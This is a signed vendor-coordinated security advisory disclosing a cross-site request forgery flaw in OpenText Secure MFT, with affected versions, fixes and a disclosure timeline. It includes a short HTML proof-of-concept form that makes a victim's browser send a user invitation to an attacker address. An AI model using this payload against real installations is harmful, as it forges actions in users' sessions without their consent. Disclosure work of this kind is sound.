-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2015-039
Product: Secure MFT
Vendor: http://www.opentext.com
Affected Version(s): 2013 R3, 2014 R1/R2, 2015 R1
Tested Version(s): 2014 R2 SP4
Vulnerability Type: Cross-Site Request Forgery (CWE-352)
Risk Level: Medium
Solution Status: Fixed
Vendor Notification: 2015-08-05
Solution Date: 2015-09-23
Public Disclosure: 2015-10-02
CVE Reference: Not yet assigned
Author of Advisory: Dr. Adrian Vollmer

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Secure MFT aims to replace FTP or file transfer via e-mail by providing a
secure and easy-to-use alternative. Users can send each other files of
practically any size either by using a Microsoft Windows client, a Microsoft
Outlook plugin or a web application.

The software manufacturer describes the application as follows
(see [1]):

"OpenText Secure MFT is an enterprise-grade managed file transfer solution
that delivers uncompromising security to safely exchange large files."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web application is vulnerable to Cross-Site Request Forgery since no
tokens are used to prevent this kind of attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

As a proof of concept, the following HTML document could be used by an
attacker to perform actions in the context of the victim if the attacker
manages to trick the victim into opening the document in their browser.

<html>
  <body>
    <form action="https://[Secure MFT host]/userinvitation" method="POST">
      <input type="hidden" name="email" value="attacker@example.org" />
      <input type="hidden" name="subject" value="CSRF Invite" />
      <input type="hidden" name="message" value="CSRF Message" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update Secure MFT to one of the following versions or newer:

    * Secure MFT 2013 R3 SP7
    * Secure MFT 2014 R1 SP11
    * Secure MFT 2014 R2 SP5
    * Secure MFT 2015 R1 SP1
    * Secure MFT 2015 R1 FP1 SP1
    
Software updates are available at [5]. For further information, see [4].

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-07-01: Vulnerability discovered
2015-08-05: Vulnerability reported to vendor
2015-09-23: Vendor publishes security alert
2015-10-02: Public release of security advisory according to the SySS
            Responsible Disclosure Policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Web site of Secure MFT
    https://www.opentext.com/what-we-do/products/information-exchange/secure-messaging/opentext-secure-mft
[2] SySS Security Advisory SYSS-2015-039
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-039.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/
[4] https://knowledge.opentext.com/knowledge/cs.dll/Open/61171764 (Knowledge Center log on required)
[5] https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&objId=61042901&objAction=browse&viewType=1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Adrian Vollmer of the SySS GmbH.

E-Mail: adrian.vollmer (at) syss.de
Key fingerprint = 70CF E88C AEE7 DB0F 5DC8  3403 0E02 7C7E 037C 9FE7

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may 
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web 
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWDi/6AAoJEA4CfH4DfJ/n5WkP/0aveg0S+J2aKuwVv88wNwTr
0lMQFAM83UWmpgP6Mj/PrmMOQBK+Qc41sHsJ737ibEIxcnPhNXlpbN8d+TMl9uJ5
dqQAcLecTC3gzfuNvu89qhoG1XOP34lKCgVHMP1NTsyzvqORR7TZYYMSxHicA4+y
qSvWcjiIiyfSHTvcHj4/TU7UjqE4CBQehqw184Jor7vg5hm5OH2eJl0M4ptpMLek
QoQkf6IpVZrdXzPwknUMra/LKxIDmGouPwhEKXNmkJV1Ti6FbgN/td+6gbpnqPbi
pUHn5VQsxlBXlf9KuJX9lZKshrtxXZ0hLbK32qVEAO9rDwgUeDN4YQFK0CHAlFNi
0p7WdQbR8o47l8e77IrwsKWmmo6z5SkaeOZYMgvCrzH/9mGfbVk43HQ/iMA8jN3J
ggEaK+9l+7r/VWGNt7QLkf/h0sBlfqaj626gw5ncFF9/9Hc61ouC0UQEzLrAYYz6
FvHvEKzISUPkSzVcKH6K4cfjIvsj57Hs1jghVMBibTeVQf7hTVn2KMUHzno/ZI4y
fAU6slyu4aG8Y/SrHqGUqEKVGtLXaSGo8TsDjThU7pxeFvbIfCM1z7J0I6QuztLl
hN2PLWI48M72xgv/hm2wBaCTLG41BGFHbY7MzWacCuq568aCm+tFOWqGVhsTOPXm
Tu89cKLfbXW4oarRud5W
=aroc
-----END PGP SIGNATURE-----